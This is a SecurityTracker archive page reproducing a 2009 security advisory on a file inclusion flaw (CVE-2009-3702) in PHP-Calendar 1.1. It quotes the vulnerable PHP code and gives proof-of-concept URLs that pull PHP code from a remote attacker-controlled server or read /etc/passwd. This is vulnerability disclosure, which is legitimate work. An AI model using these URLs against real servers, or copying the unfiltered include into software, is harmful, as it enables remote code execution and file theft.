SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Calendar)  >   PHP-Calendar Vendors:   php-calendar.sourceforge.net
PHP-Calendar Include File Bug in 'configfile' Parameter Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1023375
SecurityTracker URL:  http://securitytracker.com/id/1023375
CVE Reference:   CVE-2009-3702   (Links to External Site)
Updated:  Dec 21 2009
Original Entry Date:  Dec 21 2009
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.1, possibly other versions
Description:   Juan Galiana Lara from Internet Security Auditors reported a vulnerability in PHP-Calendar. A remote user can include and execute arbitrary code on the target system.

The software does not properly validate user-supplied input in the 'configfile' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

Systems configured with the allow_url_fopen directive set to 'on' are affected.

The vendor was notified on October 13, 2009, without response.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  php-calendar.sourceforge.net/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] [ISecAuditors Security Advisories] PHP-Calendar <= v1.1 'configfile' Remote and Local File Inclusion vulnerability

=============================================
INTERNET SECURITY AUDITORS ALERT 2009-011
- Original release date: October 13th, 2009
- Last revised: December 18th, 2009
- Discovered by: Juan Galiana Lara
- CVE ID: CVE-2009-3702
- Severity: 8.5/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
PHP-Calendar v1.1 'configfile' Remote and Local File Inclusion
vulnerability

II. BACKGROUND
-------------------------
PHP-Calendar is a simple web calendar. It is targeted towards groups
that need to collaboratively create and track events. In that same
collaborative spirit, the source for PHP-Calendar is available under
an open source license for anyone to use and modify.

III. DESCRIPTION
-------------------------
The 'configfile' variable is not properly filtered, and is possible to
include arbitrary remote and local files. This attack may lead to the
execution of arbitrary code.

The snippet of vulnerable code (part of update08.php and update10.php
file):

    36  } elseif(!empty($_GET['configfile'])) {
    37          if(file_exists($_GET['configfile'])) {
    38                  require_once($_GET['configfile']);

In order to include remote files, the value 'On' in the
allow_url_fopen directive is needed. There are two cases in which it
is possible remote code execution due to bypass the file_exists function:

1) If the victim server is running Windows operating system and there
is not a firewall filtering outgoing SMB requests, an attacker can use
an URL like //servername/path/to/file.php
2) If server is running PHP version > 5.0.0 (the most common) an
attacker can use FTP/FTPS protocol for inclusion. Like
ftp://servername/path/to/file.php See references for more information.

IV. PROOF OF CONCEPT
-------------------------
For including remote files:

http://site/php-calendar-1.1/update08.php?configfile=//servername/path/to/file.php
http://site/php-calendar-1.1/update08.php?configfile=ftp://guest:pass@site/path/to/file.php
http://site/php-calendar-1.1/update10.php?configfile=\\ip\path\to\file.php
http://site/php-calendar-1.1/update10.php?configfile=ftp://site/path/to/file.php

Local files, this PoC will show the /etc/passwd file:

http://site/php-calendar-1.1/update08.php?configfile=/etc/passwd
http://site/php-calendar-1.1/update10.php?configfile=/etc/passwd

V. BUSINESS IMPACT
-------------------------
Unauthenticated users can view any local file in the filesystem and
could execute arbitrary code remotely.

VI. SYSTEMS AFFECTED
-------------------------
PHP-Calendar version 1.1 is vulnerable, others may be affected

VII. SOLUTION
-------------------------
Change the code of update08.php (line 38) and update10.php (line 35)
in order to filter $_GET['configfile'] variable.

if (ereg('^[a-zA-Z0-9_]+$', $_GET['configfile']))
require_once($_GET['configfile']);

III. REFERENCES
-------------------------
http://www.php-calendar.com/
http://www.php.net/manual/en/wrappers.ftp.php
http://www.isecauditors.com/

IX. CREDITS
-------------------------
This vulnerability has been discovered by
Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
October   13, 2009: Initial release.
October   19, 2009: Added CVE id.
December  18, 2009: Last revision.

XI. DISCLOSURE TIMELINE
-------------------------
October   13, 2009: Vulnerability discovered by
                    Internet Security Auditors (www.isecauditors.com)
October   13, 2009: Sent to developers. No response.
December  13, 2009: Contact again. No response.
December  18, 2009: Added mitigation solution and sent to lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC